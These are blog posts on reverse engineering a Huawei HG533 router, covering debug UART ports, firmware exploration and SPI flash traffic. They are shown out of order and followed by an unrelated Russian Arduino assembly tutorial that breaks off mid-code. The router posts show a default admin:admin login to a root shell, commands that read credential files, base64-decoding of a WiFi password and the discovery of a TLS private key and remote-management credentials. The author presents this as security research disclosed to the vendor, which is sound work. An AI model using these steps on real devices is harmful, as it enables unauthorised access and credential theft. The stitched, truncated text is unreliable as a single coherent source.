So now that we’ve discussed our target, let’s gather some data about it. The first thing we wanna figure out is which actions will kickstart the flow of relevant data on the PCB. In this case there’s 1 particular action: Pressing the Factory Reset button for 10s. This should replace the existing WiFi credentials with the default ones, so the default creds will have to be generated/read. If the key or the generation algorithm need to be retrieved from Flash, we’ll see them in a traffic capture.

That’s exactly what we’re gonna do, and we’re gonna observe the UART interface, the oscilloscope and the logic analyser during/after pressing the reset button. The same process we followed for ATP’s save gives us these results:

UART output:

UART Factory Reset Debug Messages

Traffic overview:

Logic Screencap Traffic Overview

Output from our python scripts:

The traffic map tells us the device first reads and overwrites 2 large chunks of data from the protect area and then reads a smaller chunk of data from the filesystem (possibly part of the next process to execute):

|Transmission  Map|
|  MOSI  |  MISO  |
|        |0x7e0000| Size: 12    //Part of the Protected area
|        |0x7e0000| Size: 1782
|        |0x7e073d| Size: 63683
| ERASE 0x7e073d  | Size: 64kB
|0x7e073d|        | Size: 195
|0x7e0800|        | Size: 256
|0x7e0900|        | Size: 256
|0x7e0600|        | Size: 256
|0x7e0700|        | Size: 61
|        |0x7d0008| Size: 65529 //Part of the Protected area
| ERASE 0x7d0008  | Size: 64kB
|0x7d0008|        | Size: 248
|0x7d0100|        | Size: 256
|0x7dff00|        | Size: 256
|0x7d0000|        | Size: 8
|        |0x1c3800| Size: 512   //Part of the Filesystem
|        |0x1c3a00| Size: 512
|        |0x1c5a00| Size: 512
|        |0x1c5c00| Size: 512

Once again, we combine transmission map and binary files to gain some insight into the system. In this case, the ‘factory reset’ code seems to:

  1. Read ATP_LOG from Flash; it contains info such as remote router accesses or factory resets. It ends with a large chunk of 1s (0xff)
  2. Overwrite that memory segment with 1s
  3. write a ‘new’ ATP_LOG followed by the “current configuration” curcfg.xmlfile
  4. Read compressed (unintelligible to us) memory chunk from the filesystem

The chunk from the filesystem is read AFTER writing the new password to Flash, which doesn’t make sense for a password generation algorithm. That being said, the algorithm may be already loaded into memory, so its absence in the SPI traffic is not conclusive on whether or not it exists.

As part of the MOSI data we can see the new WiFi password be saved to Flash inside the XML string:

Found Current Password MOSI

What about the default password being read? If we look in the MISO binary, it’s nowhere to be seen. Either the Ralink is reading it using a different mode (secure/dual/quad/?) or the credentials/algorithm are already loaded in RAM (no need to read them from Flash again, since they can’t change). The later seems more likely, so I’m not gonna bother updating my scripts to support different read modes. We write down what we’ve found and we’ll get back to the default credentials in the next part.

Since we’re at it, let’s take a look at the SPI traffic generated when setting new WiFi credentials via HTTP: MapMISOMOSI. We can actually see the default credentials being read from the protect area of Flash this time (not sure why the Ralink would load it to set a new password; it’s probably incidental):

Default WiFi Creds In MISO Capture

As you can see, they’re in plain text and separated from almost anything else in Flash. This may very well mean there’s no password generation algorithm in this device, but it is NOT conclusive. The developers could have decided to generate the credentials only once (first boot?) and store them to flash in order to limit the number of times the algorithm is accessed/executed, which helps hide the binary that contains it. Otherwise we could just observe the running processes in the router while we press the Factory Reset button and see which ones spawn or start consuming more resources.

Next Steps

Now that we’ve got the code we need to create binary recreations of the traffic and transmission maps, getting from a capture to binary files takes seconds. I captured other transmissions such as the first few seconds of boot (mapmiso), but there wasn’t much worth discussing. The ability to easily obtain such useful data will probably come in handy moving forward, though.

In the next post we get the data straight from the source, communicating with the Flash IC directly to dump its memory. We’ll deal with compression algorithms for the extracted data, and we’ll keep piecing everything together.

Happy Hacking! 🙂


Practical Reverse Engineering Part 2 — Scouting the Firmware

Projects and learnt lessons on Systems Security, Embedded Development, IoT and anything worth writing about


  • Part 1: Hunting for Debug Ports
  • Part 2: Scouting the Firmware
  • Part 3: Following the Data
  • Part 4: Dumping the Flash
  • Part 5: Digging Through the Firmware

In part 1 we found a debug UART port that gave us access to a Linux shell. At this point we’ve got the same access to the router that a developer would use to debug issues, control the system, etc.

This first overview of the system is easy to access, doesn’t require expensive tools and will often yield very interesting results. If you want to do some hardware hacking but don’t have the time to get your hands too dirty, this is often the point where you stop digging into the hardware and start working on the higher level interfaces: network vulnerabilities, ISP configuration protocols, etc.

These posts are hardware-oriented, so we’re just gonna use this access to gather some random pieces of data. Anything that can help us understand the system or may come in handy later on.

Please check out the legal disclaimer in case I come across anything sensitive.

Full disclosure: I’m in contact with Huawei’s security team; they’ve had time to review the data I’m going to reveal in this post and confirm there’s nothing too sensitive for publication. I tried to contact TalkTalk, but their security staff is nowhere to be seen.

Picking Up Where We Left Off

Picture of Documented UARTs

We get our serial terminal application up and running in the computer and power up the router.

Boot Sequence

We press enter and get the login prompt from ATP Cli; introduce the credentials admin:admin and we’re in the ATP command line. Execute the command shell and we get to the BusyBox CLI (more on BusyBox later).

-----Welcome to ATP Cli------
Login: admin
Password:    #Password is ‘admin'
BusyBox vv1.9.1 (2013-08-29 11:15:00 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# ls
var   usr   tmp   sbin  proc  mnt   lib   init  etc   dev   bin

At this point we’ve seen the 3 basic layers of firmware in the Ralink IC:

  1. U-boot: The device’s bootloader. It understands the device’s memory map, kickstarts the main firmware execution and takes care of some other low level tasks
  2. Linux: The router is running Linux to keep overall control of the hardware, coordinate parallel processes, etc. Both ATP CLI and BusyBox run on top of it
  3. Busybox: A small binary including reduced versions of multiple linux commands. It also supplies the shell we call those commands from.

Lower level interfaces are less intuitive, may not have access to all the data and increase the chances of bricking the device; it’s always a good idea to start from BusyBox and walk your way down.

For now, let’s focus on the boot sequence itself. The developers thought it would be useful to display certain pieces of data during boot, so let’s see if there’s anything we can use.

Boot Debug Messages

We find multiple random pieces of data scattered across the boot sequence. We’ll find useful info such as the compression algorithm used for some flash segments:

boot msg kernel lzma

Intel on how the external flash memory is structured will be very useful when we get to extracting it.

ram data. not very useful

SPI Flash Memory Map!

And more compression intel:

root is squashfs'd

We’ll have to deal with the compression algorithms when we try to access the raw data from the external Flash, so it’s good to know which ones are being used.

What Are ATP CLI and BusyBox Exactly? [Theory]

The Ralink IC in this router runs a Linux kernel to control memory and parallel processes, keep overall control of the system, etc. In this case, according to the Ralink’s product brief, they used the Linux 2.6.21 SDKATP CLI is a CLI running either on top of Linux or as part of the kernel. It provides a first layer of authentication into the system, but other than that it’s very limited:

Welcome to ATP command line tool.
If any question, please input "?" at the end of command.

help doesn’t mention the shell command, but it’s usually either shell orsh. This ATP CLI includes less than 10 commands, and doesn’t support any kind of complex process control or file navigation. That’s where BusyBox comes in.

BusyBox is a single binary containing reduced versions of common unix commands, both for development convenience and -most importantly- to save memory. From ls and cd to top, System V init scripts and pipes, it allows us to use the Ralink IC somewhat like your regular Linux box.

One of the utilities the BusyBox binary includes is the shell itself, which has access to the rest of the commands:

BusyBox vv1.9.1 (2013-08-29 11:15:00 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# ls
var   usr   tmp   sbin  proc  mnt   lib   init  etc   dev   bin
# ls /bin
zebra        swapdev      printserver  ln           ebtables     cat
wpsd         startbsp     pppc         klog         dns          busybox
wlancmd      sntp         ping         kill         dms          brctl
web          smbpasswd    ntfs-3g      iwpriv       dhcps        atserver
usbserver    smbd         nmbd         iwconfig     dhcpc        atmcmd
usbmount     sleep        netstat      iptables     ddnsc        atcmd
upnp         siproxd      mount        ipp          date         at
upg          sh           mldproxy     ipcheck      cwmp         ash
umount       scanner      mknod        ip           cp           adslcmd
tr111        rm           mkdir        igmpproxy    console      acl
tr064        ripd         mii_mgr      hw_nat       cms          ac
telnetd      reg          mic          ethcmd       cli
tc           radvdump     ls           equipcmd     chown
switch       ps           log          echo         chmod

You’ll notice different BusyBox quirks while exploring the filesystem, such as the symlinks to a busybox binary in /bin/. That’s good to know, since any commands that may contain sensitive data will not be part of the BusyBox binary.

Exploring the File System

Now that we’re in the system and know which commands are available, let’s see if there’s anything useful in there. We just want a first overview of the system, so I’m not gonna bother exposing every tiny piece of data.

The top command will help us identify which processes are consuming the most resources. This can be an extremely good indicator of whether some processes are important or not. It doesn’t say much while the router’s idle, though:


One of the processes running is usbmount, so the router must support connecting ‘something’ to the USB port. Let’s plug in a flash drive in there…

usb 1-1: new high speed USB device using rt3xxx-ehci and address 2
++++++sambacms.c 2374 renice=renice -n +10 -p 1423

The USB is recognised and mounted to /mnt/usb1_1/, and a samba server is started. These files show up in /etc/samba/:

# ls -l /etc/samba/
-rw-r--r--    1 0        0             103 smbpasswd
-rw-r--r--    1 0        0               0 smbusers
-rw-r--r--    1 0        0             480 smb.conf
-rw-------    1 0        0            8192 secrets.tdb
# cat /etc/samba/smbpasswd
nobody:0:XXXXXXXXXXXXXXXXXXX:564E923F5AF30J373F7C8_______4D2A:[U ]:LCT-1ED36884:

More data, in case it ever comes in handy:

  • netstat -a: Network ports the device is listening at
  • iptables –list: We could set up telnet and continue over the network, but I’d rather stay as close to the bare metal as possible
  • wlancmd help: Utility to control the WiFi radio, plenty of options available
  • /etc/profile
  • /etc/inetd
  • /etc/services
  • /var/: Contains files used by the system during the course of its operation
  • /etc/: System configuration files, etc.

/var/ and /etc/ always contain tons of useful data, and some of it makes itself obvious at first sight. Does that say /etc/serverkey.pem??

Blurred /etc/serverkey.pem


It’s not unusual to find private keys for TLS certificates in embedded systems. By accessing 1 single device via hardware you may obtain the keys that will help you attack any other device of the same model.

This key could be used to communicate with some server from Huawei or the ISP, although that’s less common. On the other hand, it’s also very common to findpublic certs used to communicate with remote servers.

In this case we find 2 certificates next to the private key; both are self-signed by the same ‘person’:

  • /etc/servercert.pem: Most likely the certificate for the serverkey
  • /etc/root.pem: Probably used to connect to a server from the ISP or Huawei. Not sure.

And some more data in /etc/ppp256/config and /etc/ppp258/config:


These credentials are also available via the HTTP interface, which is why I’m publishing them, but that’s not the case in many other routers (more on this later).

With so many different files everywhere it can be quite time consuming to go through all the info without the right tools. We’re gonna copy as much data as we can into the USB drive and go through it on our computer.

The Rambo Approach to Intel Gathering

Once we have as many files as possible in our computer we can check some things very quick. find . -name *.pem reveals there aren’t any other TLS certificates.

What about searching the word password in all files? grep -i -r password .

Grep Password

We can see lots of credentials; most of them are for STUN, TR-069 and local services. I’m publishing them because this router proudly displays them all via the HTTP interface, but those are usually hidden.

If you wanna know what happens when someone starts pulling from that thread, check out Alexander Graf’s talk “Beyond Your Cable Modem”, from CCC 2015. There are many other talks about attacking TR-069 from DefCon, BlackHat, etc. etc.

The credentials we can see are either in plain text or encoded in base64. Of course, encoding is worthless for data protection:

$ echo "QUJCNFVCTU4=" | base64 -D

WiFi pwd in curcfg.xml

That is the current WiFi password set in the router. It leads us to 2 VERY interesting files. Not just because of their content, but because they’re a vital part of how the router operates:

  • /var/curcfg.xml: Current configuration file. Among other things, it contains the current WiFi password encoded in base64
  • /etc/defaultcfg.xml: Default configuration file, used for ‘factory reset’. Does not include the default WiFi password (more on this in the next posts)

Exploring ATP’s CLI

The ATP CLI includes very few commands. The most interesting one -besidesshell— is debug. This isn’t your regular debugger; debug display will simply give you some info about the commands igmpproxycwmpsysuptime or atpversionMost of them don’t have anything juicy, but what about cwmp? Wasn’t that related to remote configuration of routers?

debug display cwmp

Once again, these are the CWMP (TR-069) credentials used for remote router configuration. Not even encoded this time.

The rest of the ATP commands are pretty useless: clear screen, help menu, save to flash and exit. Nothing worth going into.

Exploring Uboot’s CLI

The bootloader’s command line interface offers raw access to some memory areas. Unfortunately, it doesn’t give us direct access to the Flash IC, but let’s check it out anyway.

Please choose operation:
   3: Boot system code via Flash (default).
   4: Entr boot command line interface.
You choosed 4
Stopped Uboot WatchDog Timer.
4: System Enter Boot Command Line Interface.
U-Boot 1.1.3 (Aug 29 2013 - 11:16:19)
RT3352 # help
?       - alias for 'help'
bootm   - boot application image from memory
cp      - memory copy
erase   - erase SPI FLASH memory
go      - start application at address 'addr'
help    - print online help
md      - memory display
mdio   - Ralink PHY register R/W command !!
mm      - memory modify (auto-incrementing)
mw      - memory write (fill)
nm      - memory modify (constant address)
printenv- print environment variables
reset   - Perform RESET of the CPU
rf      - read/write rf register
saveenv - save environment variables to persistent storage
setenv  - set environment variables
uip - uip command
version - print monitor version
RT3352 #

Don’t touch commands like erasemmmw or nm unless you know exactly what you’re doing; you’d probably just force a router reboot, but in some cases you may brick the device. In this case, md (memory display) and printenv are the commands that call my atention.

RT3352 # printenv
ramargs=setenv bootargs root=/dev/ram rw
addip=setenv bootargs $(bootargs) ip=$(ipaddr):$(serverip):$(gatewayip):$(netmask):$(hostname):$(netdev):off
addmisc=setenv bootargs $(bootargs) console=ttyS0,$(baudrate) ethaddr=$(ethaddr) panic=1
flash_self=run ramargs addip addmisc;bootm $(kernel_addr) $(ramdisk_addr)
load=tftp 8A100000 $(u-boot)
u_b=protect off 1:0-1;era 1:0-1;cp.b 8A100000 BC400000 $(filesize)
loadfs=tftp 8A100000 root.cramfs
u_fs=era bc540000 bc83ffff;cp.b 8A100000 BC540000 $(filesize)
test_tftp=tftp 8A100000 root.cramfs;run test_tftp
ethact=Eth0 (10/100-M)

Environment size: 765/4092 bytes

We can see settings like the UART baudrate, as well as some interesting memory locations. Those memory addresses are not for the Flash IC, though. The flash memory is only addressed by 3 bytes: [0x000000000x00FFFFFF].

Let’s take a look at some of them anyway, just to see the kind of access this interface offers.What about kernel_addr=BFC40000?

md `badd` Picture

Nope, that badd message means bad address, and it has been hardcoded in md to let you know that you’re trying to access invalid memory locations. These are good addresses, but they’re not accessible to u-boot at this point.

It’s worth noting that by starting Uboot’s CLI we have stopped the router from loading the linux Kernel onto memory, so this interface gives access to a very limited subset of data.

SPI Flash string in md

We can find random pieces of data around memory using this method (such as thatSPI Flash Image string), but it’s pretty hopeless for finding anything specific. You can use it to get familiarised with the memory architecture, but that’s about it. For example, there’s a very obvious change in memory contents at 0x000d0000:

md.w 0x000d0000

And just because it’s about as close as it gets to seeing the girl in the red dress, here is the md command in action. You’ll notice it’s very easy to spot that change in memory contents at 0x000d0000.

Next Steps

In the next post we combine firmware and bare metal, explain how data flows and is stored around the device, and start trying to manipulate the system to leak pieces of data we’re interested in.

Thanks for reading! 🙂

Practical Reverse Engineering Part 1 — Hunting for Debug Ports

Projects and learnt lessons on Systems Security, Embedded Development, IoT and anything worth writing about

  • Part 1: Hunting for Debug Ports
  • Part 2: Scouting the Firmware
  • Part 3: Following the Data
  • Part 4: Dumping the Flash
  • Part 5: Digging Through the Firmware


In this series of posts we’re gonna go through the process of Reverse Engineering a router. More specifically, a Huawei HG533.

Huawei HG533

At the earliest stages, this is the most basic kind of reverse engineering. We’re simple looking for a serial port that the engineers who designed the device left in the board for debug and -potentially- technical support purposes.

Even though I’ll be explaining the process using a router, it can be applied to tons of household embedded systems. From printers to IP cameras, if it’s mildly complex it’s quite likely to be running some form of linux. It will also probably have hidden debug ports like the ones we’re gonna be looking for in this post.

Finding the Serial Port

Most UART ports I’ve found in commercial products are between 4 and 6 pins, usually neatly aligned and sometimes marked in the PCB’s silkscreen somehow. They’re not for end users, so they almost never have pins or connectors attached.

After taking a quick look at the board, 2 sets of unused pads call my atention (they were unused before I soldered those pins in the picture, anyway):

Pic of the 2 Potential UART Ports

This device seems to have 2 different serial ports to communicate with 2 different Integrated Circuits (ICs). Based on the location on the board and following their traces we can figure out which one is connected to the main IC. That’s the most likely one to have juicy data.

In this case we’re simply gonna try connecting to both of them and find out what each of them has to offer.

Identifying Useless Pins

So we’ve found 2 rows of pins that -at first sight- could be UART ports. The first thing you wanna do is find out if any of those contacts is useless. There’s a very simple trick I use to help find useless pads: Flash a bright light from the backside of the PCB and look at it from directly above. This is what that looks like:

2nd Serial Port - No Headers

We can see if any of the layers of the PCB is making contact with the solder blob in the middle of the pad.

  1. Connected to something (we can see a trace “at 2 o’clock”)
  3. 100% connected to a plane or thick trace. It’s almost certainly a power pin, either GND or Vcc
  4. Connections at all sides. This one is very likely to be the other power pin. There’s no reason for a data pin in a debug port to be connected to 4 different traces, but the pad being surrounded by a plane would explain those connections
  5. Connected to something

Soldering Pins for Easy Access to the Lines

In the picture above we can see both serial ports.

The pads in these ports are through-hole, but the holes themselves are filled in with blobs of very hard, very high melting point solder.

I tried soldering the pins over the pads, but the solder they used is not easy to work with. For the 2nd serial port I decided to drill through the solder blobs with a Dremel and a needle bit. That way we can pass the pins through the holes and solder them properly on the back of the PCB. It worked like a charm.

Use a Dremel to Drill Through the Solder Blobs

Identifying the Pinout

So we’ve got 2 connectors with only 3 useful pins each. We still haven’t verified the ports are operative or identified the serial protocol used by the device, but the number and arrangement of pins hint at UART.

Let’s review the UART protocol. There are 6 pin types in the spec:

  • Tx [Transmitting Pin. Connects to our Rx]
  • Rx [Receiving Pin. Connects to our Tx]
  • GND [Ground. Connects to our GND]
  • Vcc [The board’s power line. Usually 3.3V or 5V. DO NOT CONNECT]
  • CTS [Typically unused]
  • DTR [Typically unused]

We also know that according to the Standard, Tx and Rx are pulled up (set to 1) by default. The Transmitter of the line (Tx) is in charge of pulling it up, which means if it’s not connected the line’s voltage will float.

So let’s compile what we know and get to some conclusions:

  1. Only 3 pins in each header are likely to be connected to anything. Those must be Tx, Rx and GND
  2. Two pins look a lot like Vcc and GND
  3. One of them -Tx- will be pulled up by default and be transmitting data
  4. The 3rd of them, Rx, will be floating until we connect the other end of the line

That information seems enough to start trying different combinations with your UART-to-USB bridge, but randomly connecting pins you don’t understand is how you end up blowing shit up.

Let’s keep digging.

A multimeter or a logic analyser would be enough to figure out which pin is which, but if you want to understand what exactly is going on in each pin, nothing beats a half decent oscilloscope:

Channel1=Tx Channel2=Rx

After checking the pins out with an oscilloscope, this is what we can see in each of them:

  1. GND and Vcc verified — solid 3.3V and 0V in pins 2 and 3, as expected
  2. Tx verified — You can clearly see the device is sending information
  3. One of the pins floats at near-0V. This must be the device’s Rx, which is floating because we haven’t connected the other side yet.

So now we know which pin is which, but if we want to talk to the serial port we need to figure out its baudrate. We can find this with a simple protocol dump from a logic analyser. If you don’t have one, you’ll have to play “guess the baudrate” with a list of the most common ones until you get readable text through the serial port.

This is a dump from a logic analyser in which we’ve enabled protocol analysis and tried a few different baudrates. When we hit the right one, we start seeing readable text in the sniffed serial data (\n\r\n\rU-Boot 1.1.3 (Aug...)

Logic Protocol Analyser

Once we have both the pinout and baudrate, we’re ready to start communicating with the device:

Documented UART Pinouts

Connecting to the Serial Ports

Now that we’ve got all the info we need on the hardware side, it’s time to start talking to the device. Connect any UART to USB bridge you have around and start wandering around. This is my hardware setup to communicate with both serial ports at the same time and monitor one of the ports with an oscilloscope:

All Connected

And when we open a serial terminal in our computer to communicate with the device, the primary UART starts spitting out useful info. These are the commands I use to connect to each port as well as the first lines they send during the boot process:

Boot Sequence

Please choose operation:
   3: Boot system code via Flash (default).
   4: Entr boot command line interface.

‘Command line interface’?? We’ve found our way into the system! When we press 4we get a command line interface to interact with the device’s bootloader.

Furthermore, if we let the device start as the default 3, wait for it to finish booting up and press enter, we get the message Welcome to ATP Cli and a login prompt. If the devs had modified the password this step would be a bit of an issue, but it’s very common to find default credentials in embedded systems. After a few manual tries, the credentials admin:admin succeeded and I got access into the CLI:

-----Welcome to ATP Cli------

Login: admin
Password:    #Password is ‘admin'

BusyBox vv1.9.1 (2013-08-29 11:15:00 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# ls
var   usr   tmp   sbin  proc  mnt   lib   init  etc   dev   bin

Running the shell command in ATP will take us directly into Linux’s CLI with root privileges 🙂

This router runs BusyBox, a linux-ish interface which I’ll talk about in more detail in the next post.

Next Steps

Now that we have access to the BusyBox CLI we can start nosing around the software. Depending on what device you’re reversing there could be plain text passwords, TLS certificates, useful algorithms, unsecured private APIs, etc. etc. etc.

In the next post we’ll focus on the software side of things. I’ll explain the differences between boot modes, how to dump memory, and other fun things you can do now that you’ve got direct access to the device’s firmware.

Thanks for reading! 🙂

Как программировать Arduino на ассемблере

Читаем данные с датчика температуры DHT-11 на «голом» железе Arduino Uno ATmega328p используя только ассемблер

Попробуем на простом примере рассмотреть, как можно “хакнуть” Arduino Uno и начать писать программы в машинных кодах, т.е. на ассемблере для микроконтроллера ATmega328p. На данном микроконтроллере собственно и собрана большая часть недорогих «классических» плат «duino». Данный код также будет работать на практически любой demo плате на ATmega328p и после небольших возможных доработок на любой плате Arduino на Atmel AVR микроконтроллере. В примере я постарался подойти так близко к железу, как это только возможно. Для лучшего понимания того, как работает микроконтроллер не будем использовать какие-либо готовые библиотеки, а уж тем более Arduino IDE. В качестве учебно-тренировочной задачи попробуем сделать самое простое что только возможно — правильно и полезно подергать одной ногой микроконтроллера, ну то есть будем читать данные из датчика температуры и влажности DHT-11.

Arduino очень клевая штука, но многое из того что происходит с микроконтроллером специально спрятано в дебрях библиотек и среды Arduino для того чтобы не пугать новичков. Поигравшись с мигающим светодиодом я захотел понять, как микроконтроллер собственно работает. Помимо утоления чисто познавательного зуда, знание того как работает микроконтроллер и стандартные средства общения микроконтроллера с внешним миром — это называется «периферия», дает преимущество при написании кода как для Arduino так и при написания кода на С/Assembler для микроконтроллеров а также помогает создавать более эффективные программы. Итак, будем делать все наиболее близко к железу, у нас есть: плата совместимая с Arduino Uno, датчик DHT-11, три провода, Atmel Studio и машинные коды.

Для начало подготовим нужное оборудование.

Писать код будем в Atmel Studio 7 — бесплатно скачивается с сайта производителя микроконтроллера — Atmel.

Atmel Studio 7

Весь код запускался на клоне Arduino Uno — у меня это DFRduino Uno от DFRobot, на контроллере ATmega328p работающем на частоте 16 MHz — отличная надежная плата. Каких-либо отличий от стандартного Uno в процессе эксплуатации я не заметил. Похожая чорная плата от DFBobot, только “Mega” отлетала у меня 2 года в качестве управляющего контроллера квадрокоптера — куда ее только не заносило — проблем не было.

DFRduino Uno

Для просмотра сигналов длительностью в микросекунды (а это на минутку 1 миллионная доля секунды), я использовал штуку, которая называется “логический анализатор”. Конкретно, я использовал клон восьмиканального USBEE AX Pro. Как смотреть для отладки такие быстрые процессы без осциллографа или логического анализатора — на самом деле даже не знаю, ничего посоветовать не могу.

Прежде всего я подключил свой клон Uno — как я говорил у меня это DFRduino Uno к Atmel Studio 7 и решил попробовать помигать светодиодиком на ассемблере. Как подключить описанно много где, один из примеров по ссылке в конце. Код пишется прямо в студии, прошивать плату можно через USB порт используя привычные возможности загрузчика Arduino -через AVRDude. Можно шить и через внешний программатор, я пробовал на китайском USBASP, по факту у меня оба способа работали. В обоих случаях надо только правильно настроить прошивальщик AVRDude, пример моих настроек на картинке

Полная строка аргументов:
-C “C:\avrdude\avrdude.conf” -p atmega328p -c arduino -P COM7 115200 -U flash:w:”$(ProjectDir)Debug\$(TargetName).hex:i

В итоге, для простоты я остановился на прошивке через USB порт — это стандартный способ для Arduio. На моей UNO стоит чип ATmega 328P, его и надо указать при создании проекта. Нужно также выбрать порт к которому подключаем Arduino — на моем компьютере это был COM7.

Для того, чтобы просто помигать светодиодом никаких дополнительных подключений не нужно, будем использовать светодиод, размещенный на плате и подключенный к порту Arduino D13 — напомню, что это 5-ая ножка порта «PORTB» контроллера.

Подключаем плату через USB кабель к компьютеру, пишем код в студии, прошиваем прямо из студии. Основная проблема здесь собственно увидеть это мигание, поскольку контроллер фигачит на частоте 16 MHz и, если включать и выключать светодиод такой же частотой мы увидим тускло горящий светодиод и собственно все.

Для того чтобы увидеть, когда он светится и когда он потушен, мы зажжем светодиод и займем процессор какой-либо бесполезной работой на примерно 1 секунду. Саму задержку можно рассчитать вручную зная частоту — одна команда выполняется за 1 такт или используя специальный калькулятор по ссылки внизу. После установки задержки, код выполняющий примерно то же что делает классический «Blink» Arduino может выглядеть примерно так:

			sbi DDRB, 5	; PORT B, Pin 5 - на выход
			sbi PORTB, 5	; выставили на Pin 5 лог единицу

loop:						    ; delay 1000 ms
			ldi  r18, 82
			ldi  r19, 43
			ldi  r20, 0
L1:			dec  r20
			brne L1
			dec  r19
			brne L1
			dec  r18
			brne L1
			in R16, PORTB	; переключили XOR 5-ый бит в порту
			ldi R17, 0b00100000
			EOR R16, R17
			out PORTB, R16
			rjmp loop
еще раз — на моей плате светодиод Arduino (D13) сидит на 5 ноге порта PORTB ATmeg-и.

Но на самом деле так писать не очень хорошо, поскольку мы полностью похерили такие важные штуки как стек и вектор прерываний (о них — позже).

Ок, светодиодиком помигали, теперь для того чтобы практика работа с GPIO была более или менее осмысленной прочитаем значения с датчика DHT11 и сделаем это также целиком на ассемблере.

Для того чтобы прочитать данные из датчика нужно в правильной последовательность выставлять на рабочей линии датчика сигналы высокого и низкого уровня — собственно это и называется дергать ногой микроконтроллера. С одной стороны, ничего сложного, с другой стороны все какая-то осмысленная деятельность — меряем температуру и влажность — можно сказать сделали первый шаг к построению какой ни будь «Погодной станции» в будущем.

Забегая на один шаг вперед, хорошо бы понять, а что собственно с прочитанными данными будем делать? Ну хорошо прочитали мы значение датчика и установили значение переменной в памяти контроллера в 23 градуса по Цельсию, соответственно. Как посмотреть на эти цифры? Решение есть! Полученные данные я буду смотреть на большом компьютере выводя их через USART контроллера через виртуальный COM порт по USB кабелю прямо в терминальную программу типа PuTTY. Для того чтобы компьютер смог прочитать наши данные будем использовать преобразователь USB-TTL — такая штука которая и организует виртуальный COM порт в Windows.

Сама схема подключения может выглядеть примерно так:

Сигнальный вывод датчика подключен к ноге 2 (PIN2) порта PORTD контролера или (что то же самое) к выводу D2 Arduino. Он же через резистор 4.7 kOm “подтянут” на “плюс” питания. Плюс и минус датчика подключены — к соответствующим проводам питания. USB-TTL переходник подключен к выходу Tx USART порта Arduino, что значит PIN1 порта PORTD контроллера.

В собранном виде на breadboard:

Разбираемся с датчиком и смотрим datasheet. Сам по себе датчик несложный, и использует всего один сигнальный провод, который надо подтянуть через резистор к +5V — это будет базовый «высокий» уровень на линии. Если линия свободна — т.е. ни контроллер, ни датчик ничего не передают, на линии как раз и будет базовый «высокий» уровень. Когда датчик или контроллер что-то передают, то они занимают линию — устанавливают на линии «низкий» уровень на какое-то время. Всего датчик передает 5 байт. Байты датчик передает по очереди, сначала показатели влажности, потом температуры, завершает все контрольной суммой, это выглядит как “HHTTXX”, в общем смотрим datasheet. Пять байт — это 40 бит и каждый бит при передаче кодируется специальным образом.

Для упрощения, будет считать, что «высокий» уровень на линии — это «единица», а «низкий» соответственно «ноль». Согласно datasheet для начала работы с датчиком надо положить контроллером сигнальную линию на землю, т.е. получить «ноль» на линии и сделать это на период не менее чем 20 милсек (миллисекунд), а потом резко отпустить линию. В ответ — датчик должен выдать на сигнальную линию свою посылку, из сигналов высокого и низкого уровня разной длительности, которые кодируют нужные нам 40 бит. И, согласно datasheet, если мы удачно прочитаем эту посылку контроллером, то мы сразу поймем что: а) датчик собственно ответил, б) передал данные по влажности и температуре, с) передал контрольную сумму. В конце передачи датчик отпускает линию. Ну и в datasheet написано, что датчик можно опрашивать не чаще чем раз в секунду.

Итак, что должен сделать микроконтроллер, согласно datasheet, чтобы датчик ему ответил — нужно прижать линию на 20 миллисекунд, отпустить и быстро смотреть, что на линии:

Датчик должен ответить — положить линию в ноль на 80 микросекунд (мксек), потом отпустить на те же 80 мксек — это можно считать подтверждением того, что датчик на линии живой и откликается:

После этого, сразу же, по падению с высокого уровня на нижний датчик начинает передавать 40 отдельных бит. Каждый бит кодируются специальной посылкой, которая состоит из двух интервалов. Сначала датчик занимает линию (кладет ее в ноль) на определенное время — своего рода первый «полубит». Потом датчик отпускает линию (линия подтягивается к единице) тоже на определенное время — это типа второй «полубит». Длительность этих интервалов — «полубитов» в микросекундах кодирует что собственно пытается передать датчик: бит “ноль” или бит “единица”.

Рассмотрим описание битовой посылки: первый «полубит» всегда низкого уровня и фиксированной длительности — около 50 мксек. Длительность второго «полубита» определят, что датчик собственно передает.

Для передачи нуля используется сигнал высокого уровня длительностью 26–28 мксек:

Для передачи единицы, длительность сигнала высокого увеличивается до 70 микросекунд:

Мы не будет точно высчитывать длительность каждого интервала, нам вполне достаточно понимания, что если длительность второго «полубита» меньше чем первого — то закодирован ноль, если длительность второго «полубита» больше — то закодирована единица. Всего у нас 40 бит, каждый бит кодируется двумя импульсами, всего нам надо значит прочитать 80 интервалов. После того как прочитали 80 интервалов будем сравнить их попарно, первый “полубит” со вторым.

Вроде все просто, что же требуется от микроконтроллера для того чтобы прочитать данные с датчика? Получается нужно значит дернуть ногой в ноль, а потом просто считать всю длинную посылку с датчика на той же ноге. По ходу, будем разбирать посылку на «полу-биты», определяя где передается бит ноль, где единица. Потом соберем получившиеся биты, в байты, которые и будут ожидаемыми данными о влажности и температуре.

Ок, мы начали писать код и для начала попробуем проверить, а работает ли вообще датчик, для этого мы просто положим линию на 20 милсек и посмотрим на линии, что из этого получится логическим анализатором.


==========		DEFINES =======================================
; определения для порта, к которому подключем DHT11			
				.EQU DHT_InPort=PIND
				.EQU DHT_Direction=DDRD
				.EQU DHT_Direction_Pin=DDD2

				.DEF Tmp1=R16
				.DEF USART_ByteR=R17		; переменная для отправки байта через USART
				.DEF Tmp2=R18
				.DEF USART_BytesN=R19		; переменная - сколько байт отправить в USART
				.DEF Tmp3=R20
				.DEF Cycle_Count=R21		; счетчик циклов в Expect_X
				.DEF ERR_CODE=R22			; возврат ошибок из подпрограмм
				.DEF N_Cycles=R23			; счетчик в READ_CYCLES
				.DEF ACCUM=R24
				.DEF Tmp4=R25

Как я уже писал сам датчик подключен на 2 ногу порта D. В Arduino Uno это цифровой выход D2 (смотрим для проверки Arduino Pinout).

Все делаем тупо: инициализировали порт на выход, выставили ноль, подождали 20 миллисекунд, освободили линию, переключили ногу в режим чтения и ждем появление сигналов на ноге.

;============	DHD11 INIT =======================================
; после инициализации сразу !!!! надо считать ответ контроллера и собственно данные
DHT_INIT:		CLI	; еще раз, на всякий случай - критичная ко времени секция

				; сохранили X для использования в READ_CYCLES - там нет времени инициализировать
				LDI XH, High(CYCLES)	; загрузили старшйи байт адреса Cycles
				LDI XL, Low (CYCLES)	; загрузили младший байт адреса Cycles

